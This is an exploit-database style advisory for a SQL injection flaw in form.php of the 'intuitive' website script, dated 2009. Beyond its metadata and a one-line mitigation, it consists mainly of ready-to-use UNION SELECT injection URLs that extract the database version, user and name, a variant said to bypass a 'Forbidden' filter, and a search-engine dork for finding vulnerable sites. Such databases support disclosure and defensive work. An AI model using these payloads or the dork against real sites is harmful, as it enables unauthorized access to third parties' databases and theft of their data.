intuitive (form.php) Sql Injection Vulnerability

vendor:

intuitive

by:

AtT4CKxT3rR0r1ST

8,8

CVSS

HIGH

Sql Injection

CWE

Product Name: intuitive

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

intuitive (form.php) Sql Injection Vulnerability

www.site.com/form.php?id=null[Sql] www.site.com/form.php?id=-null+union+select+null,version(),null,user(),5,database(),7,null,null,10,null,null,13,null,null,16,17 T0 Bypass Forbidden www.site.com/form.php?id=-null+UNION+ALL+SELECT+null,version(),null,user(),5,database(),7,null,null,10,null,null,13,null,null,16,17

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.

Source

Exploit-DB raw data:

intuitive (form.php) Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Home : www.sec-attack.com/vb [Sec Attack Team]
.:. Script : http://www.intuitive-websites.com/
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : "site powered by intuitive-websites.com"

####################################################################

===[ Exploit ]===

www.site.com/form.php?id=null[Sql]

www.site.com/form.php?id=-null+union+select+null,version(),null,user(),5,database(),7,null,null,10,null,null,13,null,null,16,17

T0 Bypass Forbidden

www.site.com/form.php?id=-null+UNION+ALL+SELECT+null,version(),null,user(),5,database(),7,null,null,10,null,null,13,null,null,16,17

####################################################################